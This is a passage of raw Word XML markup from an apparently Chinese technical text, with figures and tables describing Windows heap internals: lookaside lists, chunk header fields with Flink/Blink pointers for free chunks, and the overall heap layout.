                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 31" o:spid="_x0000_s1048" style="position:absolute;left:5155;top:18036;width:13358;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096CDCC3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>lookaside[</w:t>
                        </w:r>
                        <w:r>
                          <w:t>126</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>]</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 32" o:spid="_x0000_s1049" style="position:absolute;left:5155;top:21356;width:13350;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B8569FF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>lookaside[</w:t>
                        </w:r>
                        <w:r>
                          <w:t>127</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>]</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 33" o:spid="_x0000_s1050" style="position:absolute;left:21357;top:4358;width:924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7EEC420C" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>8bytes</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="连接符: 曲线 35" o:spid="_x0000_s1051" type="#_x0000_t38" style="position:absolute;left:18518;top:9558;width:3943;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18wgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RagIx&#10;FETfBf8hXKFvmlWp6GoUWxD6UCiufsB1c90sbm6WJK7bv28EoY/DzJxhNrveNqIjH2rHCqaTDARx&#10;6XTNlYLz6TBegggRWWPjmBT8UoDddjjYYK7dg4/UFbESCcIhRwUmxjaXMpSGLIaJa4mTd3XeYkzS&#10;V1J7fCS4beQsyxbSYs1pwWBLn4bKW3G3ChYfl5+2WN1LczZd9NXFLo/fM6XeRv1+DSJSH//Dr/aX&#10;VjB/h+eX9APk9g8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB2nU18wgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" adj="10800" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block" joinstyle="miter"/>
                </v:shape>
                <v:rect id="矩形 36" o:spid="_x0000_s1052" style="position:absolute;left:36957;top:7863;width:92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70BCF9D2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>16bytes</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="连接符: 曲线 37" o:spid="_x0000_s1053" type="#_x0000_t38" style="position:absolute;left:33044;top:9558;width:3910;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3aQwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RagIx&#10;FETfC/5DuELfalYFq6tRbEHogyCufsB1c90sbm6WJK7bv28EoY/DzJxhVpveNqIjH2rHCsajDARx&#10;6XTNlYLzafcxBxEissbGMSn4pQCb9eBthbl2Dz5SV8RKJAiHHBWYGNtcylAashhGriVO3tV5izFJ&#10;X0nt8ZHgtpGTLJtJizWnBYMtfRsqb8XdKph9XQ5tsbiX5my66KuLnR/3E6Xeh/12CSJSH//Dr/aP&#10;VjD9hOeX9APk+g8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDpA3aQwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" adj="10800" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block" joinstyle="miter"/>
                </v:shape>
                <v:rect id="矩形 38" o:spid="_x0000_s1054" style="position:absolute;left:22472;top:21323;width:924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textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="60A28B3E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>1016bytes</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 40" o:spid="_x0000_s1055" style="position:absolute;left:31717;top:21323;width:280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5564E2C9" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="连接符: 曲线 41" o:spid="_x0000_s1056" type="#_x0000_t38" style="position:absolute;left:18528;top:23018;width:3937;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gCwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RisIw&#10;FETfF/yHcIV9W1NFRKtRdGHBB2Gx+gHX5toUm5uSxNr9e7Mg+DjMzBlmteltIzryoXasYDzKQBCX&#10;TtdcKTiffr7mIEJE1tg4JgV/FGCzHnysMNfuwUfqiliJBOGQowITY5tLGUpDFsPItcTJuzpvMSbp&#10;K6k9PhLcNnKSZTNpsea0YLClb0PlrbhbBbPd5bctFvfSnE0XfXWx8+NhotTnsN8uQUTq4zv8au+1&#10;gukY/r+kHyDXTwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBRoDgCwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" adj="10800" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block" joinstyle="miter"/>
                </v:shape>
                <v:rect id="矩形 42" o:spid="_x0000_s1057" style="position:absolute;left:36962;top:21323;width:924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14:paraId="02021892" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>1016bytes</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="连接符: 曲线 43" o:spid="_x0000_s1058" type="#_x0000_t38" style="position:absolute;left:33051;top:23018;width:3905;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PuwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RagIx&#10;FETfBf8hXKFvmlWL6GoUWxD6UCiufsB1c90sbm6WJK7bv28EoY/DzJxhNrveNqIjH2rHCqaTDARx&#10;6XTNlYLz6TBegggRWWPjmBT8UoDddjjYYK7dg4/UFbESCcIhRwUmxjaXMpSGLIaJa4mTd3XeYkzS&#10;V1J7fCS4beQsyxbSYs1pwWBLn4bKW3G3ChYfl5+2WN1LczZd9NXFLo/fM6XeRv1+DSJSH//Dr/aX&#10;VvA+h+eX9APk9g8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDOPgPuwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" adj="10800" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block" joinstyle="miter"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D713FEB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.14</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 快表结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CADF14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（3）堆块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780E725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堆块是堆分配的基本单位，分为块首和块身，块首是堆块头部的几个字节，用来标识自身信息，如堆块大小，是否空闲等。块身是堆块的数据存储区域，紧跟在块首后面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D45078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lastRenderedPageBreak/>
        <w:t>堆块的状态有占用态和空闲态两种，占用态和空闲态的堆块结构如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>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476"/>
        <w:gridCol w:w="1382"/>
        <w:gridCol w:w="1364"/>
        <w:gridCol w:w="1373"/>
        <w:gridCol w:w="1346"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="448DFCD0" w14:textId="77777777" w:rsidTr="009B6A7C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C3EF8E6"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Self Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56DF5922"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Previous Chunk size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="516B556D"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Segment Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DB91BE7"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Flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61703692"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Unused bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28EA6E16"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Tag Index (Debug)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="2B006961" w14:textId="77777777" w:rsidTr="009B6A7C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
          </w:tcPr>
          <w:p w14:paraId="16288198" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49D77AD1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>占用态堆块结构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476"/>
        <w:gridCol w:w="1382"/>
        <w:gridCol w:w="1364"/>
        <w:gridCol w:w="1373"/>
        <w:gridCol w:w="1346"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="2055A750" w14:textId="77777777" w:rsidTr="009B6A7C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A8F6FD3"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Self Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BC1F1EF"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Previous Chunk size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A6B1019"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Segment Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78558AB6"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Flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B75D3C"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Unused bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="098076AE"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Tag Index (Debug)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="5101EA22" w14:textId="77777777" w:rsidTr="009B6A7C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4147" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="11006116"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Flink(前向指针)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4149" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5699453C" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
              </w:rPr>
              <w:t>Blink(后向指针)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="3731D1AB" w14:textId="77777777" w:rsidTr="009B6A7C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
          </w:tcPr>
          <w:p w14:paraId="5180044D" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D4562D8" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空闲态堆块结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EDA427" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.15 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>占用态和空闲态的堆块结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBF4209"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3.Windows堆结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055334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对于一个进程来说可以有多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区，每一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆区</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的首地址以句柄hHeap来表示，这也是RtlAllocateHeap的第一个参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9C125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堆</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总体管理结构区存放着一些用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总体管理的结构，该结构与溢出无关</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>双指针区存放着一些成对出现的指针，用于定位分配内存以及释放内存的位置</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，Windows堆结构如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.16</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01776EC5" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpc">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72C0FD77" wp14:editId="70C8C52C">
                <wp:extent cx="5004435" cy="2571478"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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矩形 51"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="190344" y="386823"/>
                            <a:ext cx="1627259"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D5BF448" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t>Heap</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>总体管理结构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817603" y="386878"/>
                            <a:ext cx="1048761"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BD7126B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>双指针区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2866364" y="387538"/>
                            <a:ext cx="1463040" cy="342265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
